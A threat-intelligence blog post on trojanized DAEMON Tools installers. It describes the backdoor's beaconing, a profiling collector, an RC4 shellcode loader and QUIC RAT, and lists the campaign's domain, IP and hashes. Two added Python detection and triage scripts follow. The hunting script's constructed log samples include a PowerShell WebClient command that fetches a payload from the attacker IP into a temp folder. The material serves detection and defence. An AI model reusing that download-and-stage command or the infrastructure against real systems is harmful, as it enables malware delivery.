The PolySwarm Blog


DAEMON Tools Backdoor Enables Targeted Follow-On Malware Operations

May 11, 2026 3:03:25 PM / by The Hivemind

Verticals Targeted: Government, Scientific Research, Manufacturing, Retail, Education
Regions Targeted: Russia, Belarus, Thailand, Brazil, Turkey, Spain, Germany, France, Italy, China
Related Families: QUIC RAT

Executive Summary

A large-scale supply chain compromise involving the widely used DAEMON Tools software platform has exposed organizations and consumers to malicious payload deployment through digitally signed installers distributed from the vendor’s legitimate infrastructure. The attack, active since at least April 8, 2026, involved trojanized versions of DAEMON Tools containing embedded backdoors capable of downloading and executing additional malware. While thousands of infection attempts were observed globally, the operation appears selectively targeted, with advanced payloads deployed against a small subset of victims.

Key Takeaways

  • Trojanized DAEMON Tools installers were distributed from the legitimate vendor website using valid digital signatures.
  • Attackers leveraged PowerShell-based download chains, shellcode loaders, and memory-resident implants.
  • Secondary-stage targeting focused on a limited number of organizations despite broad initial infection volume.
  • Evidence suggests possible Chinese-speaking operator involvement based on embedded language artifacts.

Overview

Researchers identified a sophisticated supply chain attack targeting users of the popular disk imaging utility DAEMON Tools. The compromise affected versions 12.5.0.2421 through 12.5.0.2434 and remained active at the time of disclosure. The malicious installers were distributed directly from the legitimate DAEMON Tools infrastructure and signed with authentic certificates belonging to developer AVB Disc Soft, significantly increasing the likelihood of user trust and successful execution. Kaspersky reported on this activity.

The operation demonstrates a continuing trend of attackers targeting trusted software supply chains to bypass traditional security controls and achieve widespread initial access. Several similar compromises observed throughout 2026 have impacted software ecosystems, indicating sustained adversary interest in trusted application distribution channels as high-value compromise vectors.

Researchers reportedly observed thousands of infection attempts across more than 100 countries and territories beginning in early April. However, despite the broad distribution model, only a limited subset of infected systems received advanced follow-on payloads. This operational behavior strongly suggests a staged profiling-and-selection workflow rather than indiscriminate mass malware deployment.

Trojanized Components and Initial Access

The compromise centered around three maliciously modified binaries embedded within the DAEMON Tools installation directory:

  • DTHelper.exe
  • DiscSoftBusServiceLite.exe
  • DTShellHlp.exe

These binaries executed automatically during system startup and contained implanted backdoor functionality inserted into CRT initialization routines. Upon execution, the malware launched a dedicated thread responsible for beaconing to attacker-controlled infrastructure using HTTP GET requests.

The malware communicated with the typosquatted domain at Env-check.daemontools[.]cc.

The domain closely mimicked the legitimate DAEMON Tools infrastructure and was registered approximately one week before the observed beginning of the supply chain compromise.

The malicious server could respond with arbitrary shell commands, which the implant executed through cmd.exe and PowerShell. Observed commands used System.Net.WebClient to retrieve additional payloads from attacker infrastructure hosted at 38.180.107[.]76. Payloads were written to temporary directories and executed immediately, after which the malware attempted to delete them to reduce forensic visibility.
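The staging chain just described has a recognisable shape in endpoint telemetry: one of the three trojanized binaries as the parent, a shell as the child, a WebClient download in the command line, a payload path under a temp directory, and a reference to the campaign infrastructure. The following detection logic is an added example, not code from the bulletin or from Kaspersky; it scores constructed Sysmon-style process-creation records (Event ID 1 field names) against those traits. The three image names, the C2 domain and the staging IP are taken from the bulletin; every log record in the block is constructed.

```python
"""Detection logic for the DAEMON Tools backdoor staging chain.

Added example, not code from the original bulletin or from Kaspersky.
Scores constructed Sysmon-style process-creation records against the
behaviour the bulletin describes. Image names, C2 domain and staging IP
come from the bulletin; all log records below are constructed.
"""
import re
from dataclasses import dataclass
from typing import Dict, List, Optional

TROJANIZED_IMAGES = {"dthelper.exe", "discsoftbusservicelite.exe", "dtshellhlp.exe"}
SHELL_IMAGES = {"cmd.exe", "powershell.exe", "pwsh.exe"}
# Infrastructure named in the bulletin (defanged there as [.]cc / [.]76).
KNOWN_INFRA = ("env-check.daemontools.cc", "38.180.107.76")

DOWNLOAD_RE = re.compile(r"system\.net\.webclient|downloadfile|downloadstring", re.I)
TEMP_RE = re.compile(r"\\temp\\|%temp%|\$env:temp|\\appdata\\local\\temp", re.I)


@dataclass
class Finding:
    record_id: int
    severity: str
    reasons: List[str]


def image_name(path: str) -> str:
    """Return the lower-cased file name from a Windows image path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def assess(event: Dict[str, str]) -> Optional[Finding]:
    """Score one process-creation record; None means nothing of interest."""
    reasons: List[str] = []
    parent = image_name(event.get("ParentImage", ""))
    child = image_name(event.get("Image", ""))
    cmd = event.get("CommandLine", "")
    if parent in TROJANIZED_IMAGES and child in SHELL_IMAGES:
        reasons.append(f"{parent} spawned {child}")
    if DOWNLOAD_RE.search(cmd):
        reasons.append("WebClient download in command line")
    if TEMP_RE.search(cmd):
        reasons.append("payload path under a temp directory")
    if any(ind in cmd.lower() for ind in KNOWN_INFRA):
        reasons.append("known campaign infrastructure referenced")
    if not reasons:
        return None
    # Two or more traits together is the staging chain; one alone is a triage lead.
    return Finding(int(event["RecordId"]), "high" if len(reasons) >= 2 else "low", reasons)


def hunt(events: List[Dict[str, str]]) -> List[Finding]:
    return [f for f in (assess(e) for e in events) if f is not None]


# Constructed sample telemetry, not real logs.
SAMPLE_EVENTS = [
    {"RecordId": "1",
     "ParentImage": r"C:\Program Files\DAEMON Tools\DTHelper.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell -Command (New-Object System.Net.WebClient).DownloadFile('http://38.180.107.76/p','C:\Users\u\AppData\Local\Temp\p.exe')"},
    {"RecordId": "2",
     "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell -Command Get-Process"},
    {"RecordId": "3",
     "ParentImage": r"C:\Program Files\DAEMON Tools\DiscSoftBusServiceLite.exe",
     "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "cmd.exe /c whoami"},
    {"RecordId": "4",
     "ParentImage": r"C:\Windows\System32\svchost.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell -Command (New-Object System.Net.WebClient).DownloadString('http://intranet.example/health')"},
]

if __name__ == "__main__":
    for finding in hunt(SAMPLE_EVENTS):
        print(finding.record_id, finding.severity, "; ".join(finding.reasons))
```

The severity split matters in practice: a DAEMON Tools service spawning cmd.exe on its own, or a WebClient download from an internal URL, each produce a low-severity lead that an analyst should still review, while the combination of parent, download, temp path and known infrastructure in one record is the chain the bulletin describes and deserves an immediate response.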

Information Collection and Victim Profiling

The first-stage payload that was deployed broadly across infected systems functioned primarily as an information collector. The .NET executable, identified as envchk.exe, harvested extensive host telemetry including:

  • MAC addresses
  • Hostnames
  • DNS domain names
  • Running process lists
  • Installed software inventories
  • System locale information

Collected data was transmitted to attacker-controlled infrastructure through HTTP POST requests. Researchers additionally identified Chinese-language strings embedded within the executable, suggesting possible Chinese-speaking operator involvement, although no formal attribution has been established. The operational pattern strongly indicates the information collector was used to profile infected systems and identify high-value targets for subsequent malware deployment. Although thousands of systems received this payload, only approximately a dozen systems were selected for advanced follow-on activity.

Minimalistic Backdoor Deployment

Selected victims received a secondary payload described as a “minimalistic” backdoor. Delivery chains involved downloading encrypted shellcode and a loader executable capable of decrypting payloads using RC4 before executing them directly in memory.

The backdoor supported several capabilities including:

  • Arbitrary shell command execution
  • File downloads
  • In-memory shellcode execution
  • Persistent C2 communications

The malware communicated with attacker infrastructure using HTTP POST heartbeat requests and enabled operators to remotely execute commands and stage additional implants. Researchers also observed operational inconsistencies during hands-on-keyboard activity. Some deployment commands contained typographical errors including misspellings such as mcrypto.chiper instead of cipher, and malformed file references such as rypto.dll. These mistakes prevented successful execution in certain cases and suggest portions of the intrusion activity may have involved live operator interaction rather than fully automated tooling.

QUIC RAT and Advanced Payload Activity

In at least one confirmed case involving an educational institution in Russia, attackers escalated activity further through deployment of a more sophisticated implant dubbed QUIC RAT. QUIC RAT is a C++-based remote access trojan obfuscated using control flow flattening techniques and statically linked with the WolfSSL library. Researchers additionally identified embedded components of the legitimate msquic.dll library within the malware body. The RAT supports multiple communication protocols including HTTP, HTTP/3, QUIC, TCP, UDP, WSS, and DNS.

The malware was also observed injecting payloads into legitimate processes including notepad.exe and conhost.exe, techniques commonly associated with defense evasion and stealth execution. The limited deployment scope of QUIC RAT further reinforces the assessment that the broader DAEMON Tools compromise functioned as a selective targeting operation rather than purely opportunistic malware distribution.

Victimology

Affected systems were identified in more than 100 countries, with the highest concentrations observed in Russia, Brazil, Turkey, Spain, Germany, France, Italy, and China. Approximately 10% of affected systems belonged to businesses and organizations. Advanced backdoor deployments were concentrated against government, scientific, manufacturing, retail, and educational entities located primarily in Russia, Belarus, and Thailand.

At present, the attackers’ ultimate objectives remain unclear. The selective deployment methodology and advanced tooling could support either cyberespionage operations or financially motivated intrusion activity associated with “big game hunting” campaigns. Researchers stated that current evidence is insufficient for definitive attribution or objective assessment.

Detection and Defensive Considerations

The attack highlights several recurring supply chain attack themes increasingly observed across enterprise environments:

  • Abuse of trusted digital signatures
  • Delivery through legitimate software infrastructure
  • PowerShell-based malware staging
  • Memory-resident shellcode execution
  • Use of publicly accessible directories for payload staging
  • Injection into legitimate Windows processes

Organizations should immediately investigate systems running affected DAEMON Tools versions for indicators of compromise, suspicious PowerShell activity, abnormal outbound HTTP communications, and unauthorized processes originating from temporary directories or AppData locations. The operation also reinforces the importance of zero trust principles when evaluating trusted software ecosystems. Digitally signed binaries and legitimate update channels increasingly represent attractive compromise surfaces for advanced threat actors due to their inherent trust relationships inside enterprise environments.
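A first triage pass over a software inventory can rank hosts by the two facts the bulletin gives: the affected version range (12.5.0.2421 through 12.5.0.2434) and the published SHA-256 values. The script below is an added example, not code from the bulletin; the version bounds and the seven hashes come from the IOC section of this post, while the host inventory, hostnames and the pairing of each hash with a file path are constructed for illustration (the bulletin does not map hashes to file names). A hash match is treated as confirmed, and an affected version with no matching hash is still flagged for investigation because a published IOC list is never exhaustive.

```python
"""Prioritise hosts for investigation by DAEMON Tools version and IOC hashes.

Added example, not code from the original bulletin. The affected version
range and the SHA-256 values come from the bulletin; the host inventory
and the hash-to-file pairings are constructed. A real run would take the
inventory from an EDR or software-asset export.
"""
from typing import Dict, List, Optional, Tuple

AFFECTED_MIN = (12, 5, 0, 2421)  # first trojanized build per the bulletin
AFFECTED_MAX = (12, 5, 0, 2434)  # last trojanized build per the bulletin

IOC_SHA256 = {
    "12edcaafab7703d0819b1395f45c35e3083dd83fb8b128292cb11033453fb6e8",
    "f8599bec9a6e86aab534f6282e8b812d4997ecdf2f6064a4c0326c5e7771eb42",
    "d2a5c9cbb73849cc0667987c33a9bf3822718e1528faef005f1628de3348ffb0",
    "da1a51b7022d8e726de981fcdb364096e90a8134dd380f9d76c4c20fea701836",
    "70fb6c312529dcea7e7b2cd8fba198b5cae9fa8e3e4fe4da9f4d19997e24a00b",
    "a916e56121212613d17932e124b68752c9312e73bde8f2351054bd64394257df",
    "395ec7acd475a8acd358adc75c4615cf41737aed8a96c4f2dd792c8a6af4140c",
}

Version = Tuple[int, int, int, int]


def parse_version(text: str) -> Version:
    """Parse a four-part DAEMON Tools version string into a comparable tuple."""
    parts = text.strip().split(".")
    if len(parts) != 4 or not all(p.isdigit() for p in parts):
        raise ValueError(f"unexpected version string: {text!r}")
    return (int(parts[0]), int(parts[1]), int(parts[2]), int(parts[3]))


def version_affected(text: str) -> bool:
    """True when the build falls inside the trojanized range (inclusive)."""
    return AFFECTED_MIN <= parse_version(text) <= AFFECTED_MAX


def triage_host(host: Dict) -> Optional[Tuple[str, List[str]]]:
    """Return (priority, reasons), or None when no indicator is present."""
    reasons: List[str] = []
    version = host.get("daemon_tools_version")
    if version and version_affected(version):
        reasons.append(f"DAEMON Tools {version} is in the affected range")
    for path, digest in host.get("file_hashes", {}).items():
        if digest.lower() in IOC_SHA256:
            reasons.append(f"{path} matches a known IOC hash")
    if not reasons:
        return None
    priority = "confirmed" if any("IOC" in r for r in reasons) else "investigate"
    return priority, reasons


def triage(inventory: List[Dict]) -> Dict[str, Tuple[str, List[str]]]:
    """Map hostname -> (priority, reasons) for every host with an indicator."""
    results: Dict[str, Tuple[str, List[str]]] = {}
    for host in inventory:
        verdict = triage_host(host)
        if verdict is not None:
            results[host["hostname"]] = verdict
    return results


# Constructed inventory; hostnames, versions and hash-to-file pairings are illustrative.
# The all-zero digest is a placeholder for a file whose hash is not on the IOC list.
SAMPLE_INVENTORY = [
    {"hostname": "ws-01", "daemon_tools_version": "12.5.0.2430",
     "file_hashes": {r"C:\Program Files\DAEMON Tools\DTHelper.exe":
                     "12edcaafab7703d0819b1395f45c35e3083dd83fb8b128292cb11033453fb6e8"}},
    {"hostname": "ws-02", "daemon_tools_version": "12.5.0.2434",
     "file_hashes": {r"C:\Program Files\DAEMON Tools\DTHelper.exe":
                     "0000000000000000000000000000000000000000000000000000000000000000"}},
    {"hostname": "ws-03", "daemon_tools_version": "12.5.0.2420", "file_hashes": {}},
    {"hostname": "ws-04", "daemon_tools_version": None,
     "file_hashes": {r"C:\Users\u\AppData\Local\Temp\envchk.exe":
                     "F8599BEC9A6E86AAB534F6282E8B812D4997ECDF2F6064A4C0326C5E7771EB42"}},
]

if __name__ == "__main__":
    for hostname, (priority, reasons) in triage(SAMPLE_INVENTORY).items():
        print(hostname, priority, "; ".join(reasons))
```

Two edge cases are deliberate: ws-03 runs build 2420, one below the affected range, and is not flagged, while ws-04 has no DAEMON Tools entry at all but carries a file in a temp directory whose hash matches the IOC list, which is exactly the kind of host a version-only check would miss.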

Analyst Commentary

The DAEMON Tools compromise reflects the continued evolution of software supply chain operations from indiscriminate malware distribution toward hybrid models combining broad compromise with highly selective targeting. The attacker leveraged legitimate infrastructure, authentic code-signing certificates, and widely trusted software to establish a scalable victim acquisition pipeline while reserving advanced payload deployment for carefully profiled targets. This operational maturity mirrors tactics previously observed in major supply chain incidents.

The campaign also demonstrates how adversaries increasingly treat initial access at scale as an intelligence collection phase rather than the end objective itself. Broad deployment of lightweight reconnaissance tooling enabled the operator to identify systems of interest before escalating activity with more sophisticated implants such as QUIC RAT. This staged methodology reduces operational exposure while preserving advanced tooling for high-value environments.

For defenders, the incident reinforces the reality that trust-based assumptions surrounding signed software and legitimate download channels are no longer sufficient security boundaries. Organizations should ensure behavioral monitoring, memory analysis, process injection detection, and outbound network anomaly detection remain core components of modern defensive architecture. Traditional allowlisting models based solely on vendor reputation or code signing increasingly fail against sophisticated supply chain operations of this nature.

PolySwarm’s multi-engine malware analysis architecture can help security teams identify suspicious or low-consensus payloads associated with campaigns like the DAEMON Tools compromise. Supply chain attacks frequently involve malware delivered through trusted or digitally signed software, creating scenarios where detection coverage may vary significantly across security vendors during the early stages of a campaign. By aggregating verdicts from specialized micro-engines into a unified PolyScore, PolySwarm can provide additional visibility into emerging threats that may not yet have broad detection consensus. In campaigns involving staged payload deployment and rapidly changing malware infrastructure, access to diverse detection approaches and behavioral metadata becomes particularly valuable.

IOCs

PolySwarm has multiple samples associated with this activity.


  • 12edcaafab7703d0819b1395f45c35e3083dd83fb8b128292cb11033453fb6e8
  • f8599bec9a6e86aab534f6282e8b812d4997ecdf2f6064a4c0326c5e7771eb42
  • d2a5c9cbb73849cc0667987c33a9bf3822718e1528faef005f1628de3348ffb0
  • da1a51b7022d8e726de981fcdb364096e90a8134dd380f9d76c4c20fea701836
  • 70fb6c312529dcea7e7b2cd8fba198b5cae9fa8e3e4fe4da9f4d19997e24a00b
  • a916e56121212613d17932e124b68752c9312e73bde8f2351054bd64394257df
  • 395ec7acd475a8acd358adc75c4615cf41737aed8a96c4f2dd792c8a6af4140c


Contact us at hivemind@polyswarm.io | Check out our blog | Subscribe to our reports.


Topics: Threat Bulletin, Supply Chain Attack, PowerShell malware, Chinese threat actors, DAEMON Tools, QUIC RAT, Trojanized Installer, Software Supply Chain Security, Backdoor Malware
